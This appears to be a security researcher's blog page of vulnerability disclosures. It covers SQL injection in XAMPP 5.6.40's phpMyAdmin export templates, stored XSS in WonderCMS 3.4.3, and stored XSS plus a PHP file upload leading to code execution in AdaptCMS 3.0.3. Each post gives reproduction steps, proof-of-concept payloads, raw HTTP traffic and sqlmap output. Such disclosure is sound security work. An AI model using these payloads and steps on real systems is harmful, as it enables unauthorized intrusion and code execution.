Tuesday 27 February 2024

SQL Injection - xamppv5.6.40

Description 

- It was found that XAMPP version 5.6.40 suffers from authenticated SQL injection (error based)
- The Export functionality is vulnerable


SQL Injection

Steps to Reproduce:

  1. Login to phpmyadmin
  2. Visit Export > New Template > test > Create
  3. Navigate to "Existing Templates"
  4. Select template "test" and click "Update"
  5. Trap HTTP POST request
  6. Place single quote to "templateId" parameter


// HTTP POST request

POST /phpmyadmin/tbl_export.php HTTP/1.1

Host: 192.168.159.128

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36

[...]

ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy


// HTTP response

HTTP/1.1 200 OK

Date: Tue, 27 Feb 2024 16:44:09 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

[...]

{"success":false,"error":"#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\\' AND `username` = 'root'' at line 1"}


sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3 --fingerprint

[...]

[16:55:00] [INFO] confirming MySQL

[16:55:01] [INFO] the back-end DBMS is MySQL

[16:55:01] [INFO] actively fingerprinting MySQL

[16:55:02] [INFO] executing MySQL comment injection fingerprint

web application technology: PHP 5.6.40, Apache 2.4.37

back-end DBMS: active fingerprint: MySQL >= 5.5

               comment injection fingerprint: MySQL 5.6.52

               fork fingerprint: MariaDB

[...]


at No comments:

Friday 23 February 2024

Stored XSS - wondercmsv3.4.3


Description 

- It was found that the Current Page suffers from Stored Cross Site Scripting

- Requires valid credentials in order to access the functionality


Stored XSS


Steps to Reproduce:

  1. Login and browse to "Settings"
  2. "Current Page" > "Page Title"
  3. Input following payload into "Page Title" "><a onmouseover=alert(1) style=display:block>XSS</a>


// HTTP POST request

POST /wondercms HTTP/2

Host: 192.168.232.133

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

[...]

[...]content=%22%3E%3Ca%20onmouseover%3Dalert(1)%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fa%3E&target=pages&menu=&visibility=


// HTTP response

HTTP/2 200 OK

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

[...]


[...]

<meta name="title" content="Website title - "><a onmouseover=alert(1) style=display:block>XSS</a>" />

[...]

at No comments:

Monday 5 February 2024

Stored XSS and RCE - adaptcmsv3.0.3

 Description

- It was found that adaptcms v3.0.3 was vulnerable to stored cross site scripting

- Also the application allowed the file upload functionality to upload PHP files which resulted in remote code execution


Stored XSS


Steps to Reproduce:

  1. Login as admin and add a new article
  2. In "Title" add the following payload <svg><animate onbegin=alert(1) attributeName=x dur=1s>
  3. The stored XSS would be triggered upon visiting the article by normal user 

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]


// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

[...]
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x dur=1s> </title>
[...]


Unrestricted File Upload


Steps to Reproduce:

  1. Login as admin and visit the "Media" page
  2. Click on "Files" then use the "Add File" functionality
  3. In "File Contents" add the following PHP code <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

[...]
------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[0][File][dir]"

uploads/
------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[0][File][mimetype]"


------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[0][File][filesize]"


------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[File][content]"

<?php phpinfo(); ?>
------WebKitFormBoundaryVO2wc6i6YcQWk3oU
[...]

// HTTP response

HTTP/1.1 302 Found
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.232.133/adaptcms/admin/files
[...]


// HTTP GET request

GET /adaptcms/uploads/test-php.php HTTP/1.1
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]

[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux ubuntu 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64 </td></tr>
[...]
at No comments:

Update on Full Disclosure

 Lately have not been posting anything related to Exploit-DB or Fulldisclosure. Basically I have lost all of my source code review VMs and tools that I had. Unfortunately did not have backups, and my laptop SSD died... 

So soon will be posting several newly discovered vulnerabilities by myself.


Stay safe.

at No comments:
Subscribe to: Posts (Atom)

Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...